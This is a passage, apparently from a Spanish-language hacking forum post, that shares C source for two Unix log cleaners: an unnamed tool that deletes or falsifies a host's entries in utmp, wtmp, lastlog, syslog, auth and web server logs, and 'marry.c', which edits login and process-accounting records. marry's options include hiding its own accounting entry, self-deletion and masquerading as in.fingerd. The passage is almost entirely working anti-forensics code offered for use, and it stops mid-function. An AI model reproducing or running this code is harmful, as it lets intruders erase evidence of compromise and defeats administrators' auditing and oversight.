             clean_wtmp(argv[1],argv[2]);
             clean_lastlog(argv[1],argv[2]);
     clean_logs(argv[1],argv[2]);
     time(&t2);
     printf("the process time is %d ms\n",t2-t1);
    }
}

void clean_utmp(char *host,char *fake)
{
     int f;
     struct utmp utmp_ent;
     if ((f=open(UTMP_NAME,O_RDWR))<0) {
     perror("open");
     close(f);
        }
     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
       if (!strncmp(utmp_ent.ut_host,host,strlen(host))) {
       if(fake) {
       memcpy(utmp_ent.ut_host,fake,sizeof(utmp_ent.ut_host));
       }else {
                 memset(&utmp_ent,0,sizeof( utmp_ent ));
}
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &utmp_ent, sizeof (utmp_ent));
            }
     close(f);
     printf("\tcleaning utmp file finished\n\t");
 
}
 
void clean_wtmp(char *host,char *fake)
{
    struct utmp utmp_ent;
    int f;
        if ((f=open(WTMP_NAME,O_RDWR))<0) {
perror("open");
close(f);
         }     
     while(read (f, &utmp_ent, sizeof (struct utmp))>0) {
          if (!strncmp(utmp_ent.ut_host,host,strlen(host))) {
  if(fake) {
  memcpy(utmp_ent.ut_host,fake,sizeof(utmp_ent.ut_host));
  }else {
               memset(&utmp_ent,0,sizeof(struct utmp ));
  }
               lseek(f,-(sizeof(struct utmp)),SEEK_CUR);
               write (f, &utmp_ent, sizeof( utmp_ent ));
            }
        }
     close(f);
     printf("cleaning wtmp finished\n\t");
}
void clean_lastlog(char *host,char *fake)
{   
    int f;
    struct lastlog newll;
        if ((f=open(LASTLOG_NAME, O_RDWR)) < 0) {
perror("open");
close(f);
         } else {
               while(read(f,&newll,sizeof(struct lastlog)) > 0 ) {
                 if(!strncmp(newll.ll_host,host,strlen(host))) {
if(fake) {
memcpy(newll.ll_host,fake,sizeof(newll.ll_host));
}else {
                   memset(&newll,0,sizeof( newll ));
}
                   lseek(f, -( sizeof (struct lastlog)),SEEK_CUR);
                   write(f,&newll, sizeof( newll ));
               }
          }
        close(f);
      }
    printf("cleaning lastlog finished\n\t");
}
void clean_logs(char *host,char *fake)
{
int i;
char buffer[MIN],buff[MAX];
FILE *fin,*fout;
char *logs[] = {MESSAGES, SECURE,SYSLOG, XFERLOG, AUTH, HTTPDA, HTTPDE} ;
        char *modlogs[] = {"modMESSAGES", "modSECURE","modSYSLOG", "modXFERLOG",
"modAUTH","modHTTPDA","modHTTPDE"} ;

      i=0;
while(i<7) {
printf("cleaning %s\n\t",logs[i]);
                strcpy(buff,"");
if((fin=fopen(logs[i],"r"))==NULL
|| (fout=fopen(modlogs[i],"w"))==NULL) {
perror("fopen");
fclose(fin);
        i++;
}
       
while(fgets(buffer,MIN,fin) !=NULL) {
   if(fake) {
                      if (strstr(buffer,host) ) {
                 str_replace(buffer,host,fake);
                 fputs(buffer,fout);
                                      }else
      fputs(buffer,fout);
   }else {
   if(!strstr(buffer,host))
   fputs(buffer,fout);
   }
}
    fclose(fin);
    fclose(fout);
            if((fout=fopen(logs[i],"w"))==NULL
                   || (fin=fopen(modlogs[i],"r"))==NULL) {
    perror("fopen");
    fclose(fout);
    }
    while((fgets(buffer,MAX,fin)) !=NULL) {
    fputs(buffer,fout);
    }
            fclose(fin);           
            fclose(fout);
    unlink(modlogs[i]);
            i++;
}
printf("cleaning logs file finished\n\t");
}
void str_replace(char *source,char *pattern,char *replace)
{
      char buffer[MIN];
      char part[MIN];
      int n;
      while((n=pos(source,pattern))>=0) {
                  strcpy(buffer,&source[n+strlen(pattern)]);
                  strcpy(&source[n],replace);
                  strncpy(part,source,n+strlen(replace));
                  part[n+strlen(replace)]='\0';
                  strcat(part,buffer);
                  strcpy(source,part);
                  n=pos(source,pattern);
             } 
}
int pos(char *source,char *pattern)
{
    char substring[MIN];
    int i=0,found=0,position;
    int pattern_len=strlen(pattern);
    while(!found && i<= strlen(source) - pattern_len) {
         strncpy(substring,&source[i],pattern_len);
         substring[pattern_len]='\0';
         if(strcmp(substring,pattern)==0)
              found=1;
         else
             ++i;
        }
     if(found)
           position=i;
      else
           position=-1;
      return(position);
}

marry.c

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
/* marry v1.1 (c) 1991 -- Proff -- proff@suburbia.apana.org.au,
 * All rights reserved.
 *
 * May there be peace in the world, and objectivity amoung men.
 *
 * You may not use this program for unethical purposes.
 *
 * You may not use this program in relation to your employment, or for monetary
 * gain without express permission from the author.
 *
 * usage: 
 *   marry [-aetsuScDn] [-i src] [-o obj] [-d dump] [-p pat] [-v pat] [-m [WLA]]
 *         [-E editor] [-h program] [-b backup ]
 *
 *   -a automode, dump, run editor over dump and re-assemble to object
 *   -e edit source, assemble directly to input file, imples no insertion
 *              of records before an equal quantity of deltion
 *   -t truncate object to last line of dump source when assembling
 *   -s squeeze, delete all record in input not occuring in dump
 *              (higher entries in input will be appended unless -t is also
 *              specified)
 *   -u when in [L]astlog mode do user-id -> name lookups (time consuming)
 *   -S Security, when in [A]cct and -[a]uto mode replace editor's acct
 *              record with an unmodified random previous entry, detach from
 *              terminal, SIGKILL ourselves or execlp [-h program] to hide our
 *              acct record (marry should be exec'ed under these circumstances)
 *   -c clean, delete backup and dump files once complete
 *   -D Delete our self once complete (i.e argv[0])
 *   -n no backups, don't make backups when in -e, -a modes or when
 *              -i file == -o file
 *   -i src input, the utmp, wtmp, lastlog or p/acct file concerned. defaults
 *              to the system wtmp/lastlog/pacct depending on mode if not specified
 *   -o obj     output, the dump assembled and input merged version of the
 *              above. if given and not in -[a]uto mode, implies we are
 *              assembling, not dumping.
 *   -d dump dump, the dump (editable representation of src) file name. this
 *              is is either an input (-o specified) an output (no -o) or both
 *              -[a]uto. defaults to "marry.dmp" in the current directory if not
 *              specified
 *   -p pat     pattern match. When disassembling (dumping), only extract records
 *              which match (checked against all string fields, and the uid if
 *              the pattern is a valid username)
 *   -v pat inverse pattern match. like egrep -v. above non-logic features.
 *   -m mode mode is one of:
 *
 * W  -  utmp/wtmp (or utmpx/wtmpx see UTMPX #define)
 *                      L  -  lastlog
 *                      A  -  acct/pacct
 * 
 *   -E editor editor to be used in -[a]uto mode. defaults to /usr/bin/vi. must
 *              be the full path in -[S]ecurity mode (we do some clever
 *              symlinking)
 *   -h program hide, if -S mode is on, then attempt to conceal our acct entry by
 *              execlp'ing the specified program. this seems to work on BSD derived
 *              systems. with others, your might want to just call marry something
 *              innocous.
 *   -b backup  name of backup file, defaults to "marry.bak"
 *
 *   the following instruction codes can be placed in position one of the dump
 *   lines to be assembled (e.g "0057a" -> "=057a"):
 *
 *   '=' tag modification of entry.
 *   '+' tag insertion of entry
 *
 * Examples:
 *
 * $ marry -mW -i /etc/utmp -s -a # dump, edit, re-assemble and strip deleted
 *                                      # entries from utmp
 * 
 * $ marry -mL -u -a -n -e         # dump lastlog with usernames, edit, make no
 *                                      # backups and re-assemble in-situ directly to
 *                                      # lastlog
 *
 * $ marry -mW -a -p mil -E emacs # dump all wtmp entries matching "mil", edit
 *                                      # with emacs, re-assemble and re-write to wtmp
 *
 * $ exec marry -mA -SceD # dump all acct entries by root, edit, remove
 *     -h /usr/sbin/in.fingerd          # editor's acct record, re-assemble directly
 *     -p root -a -i /var/account/acct  # to acct in-situ, delete backup and dump file,
 *                                      # delete ourself from the disk, unassign our
 *                                      # controling terminal, and lastly overlay our
 *                                      # self (and thus our to be acct record) with
 *                                      # in.fingerd
 */

#define UTMP
#undef UTMPX /* solaris has both */
#define LASTLOG
#define PACCT

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <signal.h>
#include <pwd.h>
#include <grp.h>
#include <errno.h>

#ifdef __SVR3
#  include <getopts.h>
#endif
#ifndef bsd
#  if defined(__NetBSD__) || defined(bsdi) || defined(BSDI) || defined(__386BSD__)
#    define bsd
#  endif
#endif

#if !defined(gcc)
#  define NO_VOID /* non gcc, early compiliers */
#endif

#ifndef __SVR3
extern char *optarg;
#endif

#ifdef NO_VOID
#  define VOID int
#  define FVOID
#else
#  define VOID void
#  define FVOID void
#endif

#ifndef bool
#  define bool char
#endif

#define match(a,b) (match_s((a), (b), sizeof(a)))

#ifdef UTMP
#ifdef UTMPX
#  include <utmpx.h>
#  define S_UTMP utmpx
#  define UT_HOST ut_host
#  define UT_ID ut_id
#  define UT_TYPE ut_type
#  define UT_PID ut_pid
#  define UT_TV ut_tv
#  ifdef _PATH_WTMPX
#    define WTMP_FILE _PATH_WTMPX
#  else
#    ifdef WTMPX_FILE
#      define WTMP_FILE WTMPX_FILE
#    else
#      define WTMP_FILE "/usr/adm/wtmpx"
#    endif
#  endif
#else
#  include <utmp.h>
#  define S_UTMP utmp
#  ifndef WTMP_FILE
#    ifdef _PATH_WTMP
#      define WTMP_FILE _PATH_WTMP
#    else
#      define WTMP_FILE "/usr/adm/wtmp"
#    endif
#  endif
#  if !defined(ut_name) && !defined(ut_user)
#    define ut_user ut_name
#  endif
#  if defined(linux) || defined(bsd) || defined(sun)
#    define UT_HOST ut_host
#  endif
#  ifdef linux
#    define UT_ADDR ut_addr
#  endif
#  define UT_TIME ut_time
#  if defined(linux) || defined(solaris)
#    define UT_PID  ut_pid
#    define UT_ID   ut_id
#  endif
#  if defined(linux) || defined(solaris) || defined(sysv) || defined(SYSV) || defined(SVR4)
#    define UT_TYPE ut_type
#  endif
#endif
#endif

#ifdef LASTLOG
#  ifdef bsd
#    ifndef UTMP
#      include <utmp.h>
#    endif
#  else
#    include <lastlog.h>
#  endif
#  ifndef LASTLOG_FILE
#    ifdef _PATH_LASTLOG
#      define LASTLOG_FILE _PATH_LASTLOG
#    else
#      define LASTLOG_FILE "/usr/adm/lastlog"
#    endif
#  endif
#  define LL_HOST ll_host
#endif

#ifdef PACCT
#  include <sys/acct.h>
#  ifdef bsd
#    define PACCT_FILE "/var/account/acct"
#  else
#    define PACCT_FILE "/usr/adm/pacct"
#  endif
#endif

#ifdef UT_ADDR
#  include <arpa/inet.h>
#endif

FILE *ofh, *ifh, *afh;

#ifdef UTMP
struct S_UTMP s_utmp;
#endif
#ifdef LASTLOG
struct lastlog s_lastlog;
#endif
#ifdef PACCT
struct acct s_acct;
struct acct ac_saved;
int acct_step;
#endif
char ac_comm_hide[32];

struct passwd *uid;
struct passwd uid_s;
char **uida=NULL;
char **gida=NULL;

#define MAX_UID 65537

char *quotes="\"\"";

int globline=0;

char *a_Input=NULL;
char *a_Output=NULL;
char *a_Pattern=NULL;
char *a_Hide=NULL;
#ifdef sun
char *a_Editor="/usr/ucb/vi";
#else
char *a_Editor="/usr/bin/vi";
#endif
char *a_Dump="marry.dmp";
char *a_Backup="marry.bak";
bool f_Auto=0;
bool f_Squeeze=0;
bool f_EditSrc=0;
bool f_Truncate=0;
bool f_Exclude=0;
bool f_Uid=0;
bool f_Security=0;
bool f_Clean=0;
bool f_DeleteSelf=0;
bool f_NoBackups=0;
bool f_backedup;
char mode;

int mode_size=0;
void *mode_data;

int globline;
char *mes;
time_t otime=0;
FVOID display()
{
static int n;
time_t t;
globline++;
if (n++<30) return; /* don't want too many context switches */
n=0;
time(&t);
if (t<(otime+1)) return;
otime=t;
printf("%s%d\r", mes, globline);
fflush(stdout);
}
FVOID display_end()
{
printf("%s%d\n", mes, globline);
fflush(stdout);
}

#ifdef NO_VOID
char
#else
void
#endif
*
Smalloc(n)
int n;
{
#ifdef NO_VOID
char
#else
void
#endif
* p;
while (!(p=malloc(n))) sleep(1);
return p;
}

bool copyf(src, dst)
char *src;
char *dst;
{
#define CBUFLEN 128*1024
int fi, fo;
char *buf;
int cc;
if ((fi=open(src, O_RDONLY, 0))<0)
{
perror(src);
exit(1);
}
if ((fo=open(dst, O_WRONLY|O_CREAT|O_TRUNC, 0666))<0)
{
perror(dst);
exit(1);
}
buf=Smalloc(CBUFLEN);
while ((cc=read(fi, buf, CBUFLEN))>0)
if (write(fo, buf, cc)!=cc)
{
perror(dst);
exit(1);
}
close(fo);
close(fi);
free(buf);
return 1;
}

bool backup(src)
char *src;
{
printf("backup = %s\n", a_Backup);
fflush(stdout);
return copyf(src, a_Backup);
}

char *match_s(haystack, needle, n)
char *haystack;
char *needle;
int n;
{
static char tmp[256];
strncpy(tmp, haystack, n>sizeof(tmp)? sizeof(tmp): n);
return strstr(tmp, needle);
}

unsigned short atoi2(s)
char *s;
{
return (s[0]-'0')*10+(s[1]-'0');
}

char *p_string(s, size)
char *s;
int size;
{
static char sss[1024];
register int n;
char *ss=sss;
if (!*s) return quotes;

for (n=0; n<size; n++)
{
char c=s[n];
switch (c)
{
case '\\':
*(ss++)=c;
break;
case ' ':
*(ss++)='\\';
break;
case '\t':
*(ss++)='\\';
c='t';
break;
case '\n':
*(ss++)='\\';
c='n';
break;
case '\r':
*(ss++)='\\';
c='r';
break;
case 0:
goto end;
}
*(ss++)=c;
}
end:
*ss=0;
return sss;
}

char *skip_white(s)
char *s;
{ for (; *s && (*s=='\t' || *s==' '); s++);
if (!*s || (*s=='\n')) return NULL;
return s;
}

char *g_string(d, s, size)
char *d;
char *s;
int size;
{
int y;
char c;
char f_esc=0;
for (y=0; y<size; y++) d[y]=0;
if (!(s=skip_white(s))) return NULL;
if (*s=='"' && *(s+1)=='"') return s+2;
for (y=0; y<size; s++)
{
c=*s;
if (f_esc)
{
switch(c)
{
case 'r':
c='\r';
break;
case 'n':
c='\n';
break;
case 't':
c='\t';
break;
}
f_esc=0;
} else {
switch(c)
{
case '\\':
f_esc=1;
continue;
case ' ':
case '\t':
case '\n':
case '\0':
goto end;
}
}
d[y++]=c;
}
end:
return s+1;
}

char *time_s(tt)
time_t tt;
{
static char s[13];
time_t t=tt; /* some compilers won't take a parameter address */
struct tm *tp;
tp=localtime(&t);
sprintf(s, "%02d%02d%02d%02d%02d%02d",
tp->tm_year, tp->tm_mon+1, tp->tm_mday,
tp->tm_hour, tp->tm_min, tp->tm_sec);
return s;
}
 
time_t time_i(s)
char *s;
{
struct tm lt;
time_t t;
if (strlen(s)!=12) return (time_t)-1;
time(&t);
lt=*localtime(&t);
lt.tm_year=atoi2(s);
lt.tm_mon=atoi2(s+2)-1;
lt.tm_mday=atoi2(s+4);
lt.tm_hour=atoi2(s+6);
lt.tm_min=atoi2(s+8);
lt.tm_sec=atoi2(s+10);
lt.tm_isdst=-1;
return mktime(&lt);
}

char *
bgetgrgid(u)
gid_t u;
{
struct group *gr;
if (!gida)
{
int n;
gida=(char **)Smalloc(sizeof(char *)*MAX_UID);
for (n=0; n<MAX_UID; n++) gida[n]=NULL;
}
if (gida[u]==(char *)-1) return NULL;
if (gida[u]) return gida[u];
if (!(gr=getgrgid(u)))
{
gida[u]=(char *)-1;
return NULL;
}
gida[u]=Smalloc(strlen(gr->gr_name)+1);
strcpy(gida[u], gr->gr_name);
return gida[u];
}

char *
bgetpwuid(u)
uid_t u;
{
struct passwd *pw;
if (!uida)
{
int n;
uida=(char **)Smalloc(sizeof(struct passwd *)*MAX_UID);
for (n=0; n<MAX_UID; n++) uida[n]=NULL;
}
if (uida[u]==(char *)-1) return NULL;
if (uida[u]) return uida[u];
if (!(pw=getpwuid(u)))
{
uida[u]=(char *)-1;
return NULL;
}
uida[u]=Smalloc(strlen(pw->pw_name)+1);
strcpy(uida[u], pw->pw_name);
return uida[u];
}

#ifdef UTMP
bool dump_utmp(uline, ut)
int uline;
struct S_UTMP *ut;
{
time_t tim;
if (a_Pattern)
{
if (!match(ut->ut_user, a_Pattern) &&
    !match(ut->ut_line, a_Pattern)
#ifdef UT_HOST
    && !match(ut->UT_HOST, a_Pattern)
#endif
) {if (!f_Exclude) return 1;}
else if (f_Exclude) return 1;
}
fprintf(afh, "%05x", uline-1);
fprintf(afh, " %-8s", p_string(ut->ut_user, sizeof(ut->ut_user)));
fprintf(afh, " %-11s", p_string(ut->ut_line, sizeof(ut->ut_line)));
#ifdef UT_ID
fprintf(afh, " %-4s", p_string(ut->UT_ID, sizeof(ut->UT_ID)));
#endif
#ifdef UT_TYPE
fprintf(afh, " %-2x", ut->UT_TYPE);
#endif
#ifdef UT_PID
fprintf(afh, " %-5d", (int)ut->UT_PID);
#endif
#if defined(UT_TIME) || defined (UT_TV)
#  ifdef UT_TIME
tim=ut->UT_TIME;
#  else
tim=ut->UT_TV.tv_sec;
#  endif
fprintf(afh, " %s", time_s(tim));
#endif
#ifdef UT_ADDR
fprintf(afh, " %-15s", inet_ntoa(*((struct in_addr *)&ut->UT_ADDR)));
#endif
#ifdef UT_HOST
fprintf(afh, " %s", p_string(ut->UT_HOST, sizeof(ut->UT_HOST)));
#endif
fputc('\n', afh);
return 1;
}
#endif

#ifdef LASTLOG
bool dump_lastlog(uline, ll)
int uline;
struct lastlog *ll;
{
char *name;
struct passwd *pw;
if (f_Uid)
{
pw=getpwuid(uline-1);
name=pw? pw->pw_name: quotes;
} else
{
  static char s[6];
  sprintf(s, "%05d", uline-1);
name=s;
}
if (a_Pattern)
{
if (
    (!uid || (uid->pw_uid!=(uline-1))) &&
    (!f_Uid || strstr(name, a_Pattern)) &&
#ifdef LL_HOST
    !match(ll->ll_host, a_Pattern) &&
#endif
    !match(ll->ll_line, a_Pattern)
) {if (!f_Exclude) return 1;}
else if (f_Exclude) return 1;
}
fprintf(afh, "%05x", uline-1);
fprintf(afh, " %-8s", name);
fprintf(afh, " %-11s", p_string(ll->ll_line, sizeof(ll->ll_line)));
fprintf(afh, " %s", time_s(ll->ll_time));
#ifdef LL_HOST
fprintf(afh, " %s", p_string(ll->LL_HOST, sizeof(ll->LL_HOST)));
#endif
fputc('\n', afh);
return 1;
}
#endif

#ifdef PACCT
bool dump_pacct(uline, ac)
int uline;
struct acct *ac;
{
char *name;
char *gr_name;
if (!(name=bgetpwuid(ac->ac_uid)))
{
  static char s[6];
  sprintf(s, "%05d", ac->ac_uid);
name=s;
}
if (!(gr_name=bgetgrgid(ac->ac_gid)))
{
  static char s[6];
  sprintf(s, "%05d", ac->ac_gid);
gr_name=s;
}
if (a_Pattern)
{
if (
    (!uid || (uid->pw_uid!=ac->ac_uid)) &&
    (strstr(name, a_Pattern)) &&
    (strstr(gr_name, a_Pattern))
) {if (!f_Exclude) return 1;}
else if (f_Exclude) return 1;
}
fprintf(afh, "%05x", uline-1);
fprintf(afh, " %-8s", name);
fprintf(afh, " %-8s", gr_name);
fprintf(afh, " %-10s", p_string(ac->ac_comm, sizeof(ac->ac_comm)));
if (ac->ac_tty==(dev_t)-1)
fputs(" ----", afh);
else
fprintf(afh, " %04x", ac->ac_tty);
fprintf(afh, " %2x", ac->ac_flag);
fprintf(afh, " %s", time_s(ac->ac_btime));
fputc('\n', afh);
return 1;
}
#endif

FVOID makedump()
{
int uline;
if ((ifh=fopen(a_Input, "r"))==NULL)
{
perror(a_Input);
exit(1);
}
if ((afh=fopen(a_Dump, "w"))==NULL)
{
perror(a_Dump);
exit(1);
}
fputc('\n', stdout);
globline=0;
mes="entries disassembled: ";
for (uline=1; fread(mode_data, mode_size, 1, ifh)>0; uline++)
{
display();
switch(mode)
{
#ifdef UTMP
case 'W':
dump_utmp(uline, mode_data);
break;
#endif
#ifdef LASTLOG
case 'L':
dump_lastlog(uline, mode_data);
break;
#endif
#ifdef PACCT
case 'A':
dump_pacct(uline, mode_data);
break;
#endif
}
}
display_end();
fclose(afh);
fclose(ifh);
}

int seek_ifh(uline)
int uline;
{
if (ftell(ifh)!=mode_size*(uline-1))
if (fseek(ifh, mode_size*(uline-1), SEEK_SET)==-1)
return 0;
return 1;
}

#ifdef UTMP
int mod_utmp(ut, p)
struct S_UTMP *ut;
char *p;
{
char *op;
static char tmp[255];
#if defined(UT_TIME) || defined(UT_TV)
#endif
op=p;
if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
if (!(p=g_string(ut->ut_user, p, sizeof(ut->ut_user)))) return 0;
if (!(p=g_string(ut->ut_line, p, sizeof(ut->ut_line)))) return 0;
#ifdef UT_ID
if (!(p=g_string(ut->UT_ID, p, sizeof(ut->UT_ID)))) return 0;
#endif
#ifdef UT_TYPE
if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
sscanf(tmp, "%x", (unsigned int *)&(ut->UT_TYPE));
#endif
#ifdef UT_PID
if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
ut->UT_PID=atoi(tmp);
#endif
#if defined(UT_TIME) || defined(UT_TV)
if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
#  ifdef UT_TIME
if ((ut->UT_TIME=time_i(tmp))==(time_t)-1)
#  else /* UT_TV */
if ((ut->UT_TV.tv_sec=time_i(tmp))==(time_t)-1)
#  endif
fprintf(stderr, "warning: invalid time spec %s", op);
#endif
#ifdef UT_ADDR
if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
ut->UT_ADDR=inet_addr(tmp);
#endif
#ifdef UT_HOST
if (!(p=g_string(ut->UT_HOST, p, sizeof(ut->UT_HOST)))) return 0;
#endif
return 1;
}
#endif

#ifdef LASTLOG
int mod_lastlog(ll, p)
struct lastlog *ll;
char *p;
{
char *op;
static char tmp[255];
op=p;
if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0; /*skip name*/
if (!(p=g_string(ll->ll_line, p, sizeof(ll->ll_line)))) return 0;
if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
if ((ll->ll_time=time_i(tmp))==(time_t)-1)
fprintf(stderr, "warning illegal time: %s\n", op);
#ifdef LL_HOST
if (!(p=g_string(ll->ll_host, p, sizeof(ll->ll_host)))) return 0;
#endif
return 1;
}
#endif

#ifdef PACCT
int mod_pacct(ac, p)
struct acct *ac;
char *p;
{
static char tmp[255];
struct passwd *pw;
struct group *gr;
char *op;
long int t;
unsigned int tu;
op=p;
if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
if (sscanf(tmp, "%ld", &t)!=1)
{
if (!(pw=getpwnam(tmp)))
fprintf(stderr, "warning: unknown username %s\n", op);
else
ac->ac_uid=pw->pw_uid;
} else ac->ac_uid=t;
if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
if (sscanf(tmp, "%ld", &t)!=1)
{
if (!(gr=getgrnam(tmp)))
fprintf(stderr, "warning: unknown group %s\n", op);
else
ac->ac_gid=pw->pw_gid;
} else ac->ac_gid=t;
if (!(p=g_string(ac->ac_comm, p, sizeof(ac->ac_comm)))) return 0;
if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
if (sscanf(tmp, "%x", &tu)!=1) ac->ac_tty=(dev_t)-1;
else ac->ac_tty=tu;
if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
if (sscanf(tmp, "%x", &tu)!=1)
fprintf(stderr, "warning: invalid flags %s\n", op);
else ac->ac_flag=tu;
if (!(p=g_string(tmp, p, sizeof(tmp)))) return 0;
if ((ac->ac_btime=time_i(tmp))==(time_t)-1)
fprintf(stderr, "warning: illegal time: %s\n", op);
return 1;
}
#endif

bool wcopy(uline)
int uline;
{
if (!seek_ifh(uline)) return 0;
while (fread(mode_data, mode_size, 1, ifh)>0)
{
display();
#ifdef PACCT
if (f_Security && f_Auto && mode=='A')
{
struct acct *p;
p=(struct acct *)mode_data;
if (!strncmp(p->ac_comm, ac_comm_hide, sizeof(ac_comm_hide)))
{
ac_saved.ac_btime=p->ac_btime;
*p=ac_saved;
}
}
#endif
if (fwrite(mode_data, mode_size, 1, ofh)<1) return 0;
}
#ifndef NO_FTRUNCATE
if (f_Squeeze && f_EditSrc) ftruncate(fileno(ofh), ftell(ofh));
#endif
return 1;
}

bool domod(p)
char *p;
{
bool ret=0;
if (fread(mode_data, mode_size, 1, ifh)<1) return 0;
switch(mode)
{
#ifdef UTMP
case 'W':
ret=mod_utmp(mode_data, p);
break;
#endif
#ifdef LASTLOG
case 'L':
ret=mod_lastlog(mode_data, p);
break;
#endif
#ifdef PACCT
case 'A':
ret=mod_pacct(mode_data, p);
break;
#endif
}
if (!ret)
fprintf(stderr, "warning: invalid dump input `%s'\n", p);
return 1;
}

static wu_line=0;

int obj_update(uline, p, f_mod)
int uline;
char *p;
char f_mod;
{
if (f_Squeeze)
{
display();
seek_ifh(uline);
if (f_mod) {if (!domod(p)) return 0;}
else if (fread(mode_data, mode_size, 1, ifh)<1) return 0;
if (fwrite(mode_data, mode_size, 1, ofh)<1) return 0;
} else {
if (f_EditSrc)
{
if (f_mod)
fseek(ofh, mode_size*(uline-1), SEEK_SET);
} else {
while(++wu_line<uline)
{
display();
if (fread(mode_data, mode_size, 1, ifh)<1) return 0;
if (fwrite(mode_data, mode_size, 1, ofh)<1) return 0;
}
}
if (f_mod)
{
seek_ifh(uline);
if (!domod(p)) return 0;
if (f_mod==2) wu_line--;
} else if (fread(mode_data, mode_size, 1, ifh)<1) return 0;
if (fwrite(mode_data, mode_size, 1, ofh)<1) return 0;
display();
}
#ifdef PACCT
if (f_Security && f_Auto && !f_mod && mode=='A')
if (!uline%acct_step) ac_saved=*(struct acct *)mode_data;
#endif
return 1;
}

FVOID makeobject()
{
int uline=1;
char line[1024];
char *p;
char f_mod;
if ((ifh=fopen(a_Input, "r"))==NULL)
{
perror(a_Input);
exit(1);
}
if ((afh=fopen(a_Dump, "r"))==NULL)
{
perror(a_Dump);
exit(1);
}
if ((ofh=fopen(a_Output, f_EditSrc? "r+": "w"))==NULL)
{
perror(a_Output);
exit(1);
}
#ifdef PACCT
if (f_Security && f_Auto && mode=='A')
acct_step=(getpid()+8)%60;
#endif
fputc('\n', stdout);
globline=0;
mes="entries assembled: ";
while (1)
{
if (!fgets((p=line), sizeof(line), afh))
{
if (f_EditSrc)
{
#ifndef NO_FTRUNCATE
if (f_Truncate)
{
fflush(ofh);
ftruncate(fileno(ofh), uline*mode_size);
}
#endif
goto closeup;
}
if (!f_Truncate) wcopy(uline+1);
goto closeup;
}
switch (*p)
{
case 0:
case '#':
case '\n':
continue;
case '=':
f_mod=1;
p++;
break;
case '+':
if (f_EditSrc)
{
if (f_Squeeze)
fprintf(stderr, "warning: the + operator can have \
unpredictable effects when used in conbination with -e and -s\n");
else
{
fprintf(stderr, "error: + operator used with -e\n");
exit(1);
}
}
f_mod=2;
p++;
break;
default: {f_mod=0; break;}
}
if (sscanf(p, "%x", &uline)!=1)
{
perror("invalid line number in ascii input");
exit(1);
}
uline++;
if (!obj_update(uline, p, f_mod))
  {
perror("read/write failed");
exit(1);
}
}
closeup:
display_end();
fclose(ofh);
fclose(ifh);
fclose(afh);
}

FVOID usage(s)
char *s;
{
fprintf(stderr, "usage: %s\t[-aetsuScDn] [-i src] [-o obj] [-d dump] [-p pat] [-v pat] [-m [WLA]]\n\
\t\t[-E editor] [-h program]\n", s);
exit(1);
}

int main(argc, argv)
int argc;
char **argv;
{
char *ed;
char c;
#ifdef PACCT
mode='A';
#endif
#ifdef LASTLOG
mode='L';
#endif
#ifdef UTMP
mode='W';
#endif

puts("marry v1.0 (c) 1991 -- Proff -- All rights reserved.");
umask(022);
while ((c=getopt(argc, argv, "i:o:d:aetsp:v:m:uScDnE:h:b:"))!=-1)
switch(c)
{
case 'i':
a_Input=optarg;
break;
case 'o':
a_Output=optarg;
break;
case 'd':
a_Dump=optarg;
break;
case 'a':
f_Auto=1;
break;
case 'e':
f_EditSrc=1;
break;
case 't':
f_Truncate=1;
break;
case 's':
f_Squeeze=1;
break;
case 'p':
a_Pattern=optarg;
break;
case 'v':
f_Exclude=1;
a_Pattern=optarg;
break;
case 'm':
mode=*optarg;
break;
case 'u':
f_Uid=1;
break;
case 'S':
f_Security=1;
break;
case 'c':
f_Clean=1;
break;
case 'D':
f_DeleteSelf=1;
break;
case 'n':
f_NoBackups=1;
break;
case 'E':
a_Editor=optarg;
break;
case 'h':
a_Hide=optarg;
break;
case 'b':
a_Backup=optarg;
break;
case '?':
default:
fprintf(stderr, "%s: unknown option `%c'\n", argv[0], c);
usage(argv[0]);
/* NOT_REACHED */
}
if (a_Output && f_EditSrc)
{
perror("can't have -o and -e together");
exit(1);
}
switch(mode)
{
#ifdef UTMP
case 'W':
mode_size=sizeof(struct S_UTMP);
mode_data=&s_utmp;
if (!a_Input) a_Input=WTMP_FILE;
break;
#endif
#ifdef LASTLOG
case 'L':
mode_size=sizeof(struct lastlog);
mode_data=&s_lastlog;
if (!a_Input) a_Input=LASTLOG_FILE;
break;
#endif
#ifdef PACCT
case 'A':
mode_size=sizeof(struct acct);
mode_data=&s_acct;
if (!a_Input) a_Input=PACCT_FILE;
break;
#endif
        default:
fprintf(stderr, "unknown mode `%c'\n", mode);
usage();
/*NOT_REACHED*/
}
if (a_Pattern) uid=getpwnam(a_Pattern);
if (uid) {uid_s=*uid; uid=&uid_s;}
if (f_Auto)
{
struct stat st1, st2;
int pid;
int ws;
if (stat(a_Editor, &st1))
{
fprintf(stderr, "error: editor `%s' must exist with -a (check -E value)\n", a_Editor);
exit(1);
}
makedump();
if (f_Security)
{
sprintf(ac_comm_hide, "m%d", getpid());
symlink(a_Editor, ac_comm_hide);
ed=ac_comm_hide;
} else  ed=a_Editor;

stat(a_Dump, &st1);
if (!(pid=fork()))
{
printf("%s %s\n", ed, a_Dump);
fflush(stdout);
execlp(ed, ed, a_Dump, 0);
perror(ed);
_exit(1);
}
if (pid<0)
{
perror("fork");
exit(1);
}
while (wait(&ws)!=pid);
if (f_Security)
unlink(ac_comm_hide);
stat(a_Dump, &st2);
if (st1.st_mtime==st2.st_mtime)
{
fprintf(stderr, "`%s' not modified -- aborted\n", a_Dump);
exit(1);
}
if (!a_Output || !strcmp(a_Input, a_Output))
{
backup(a_Input);
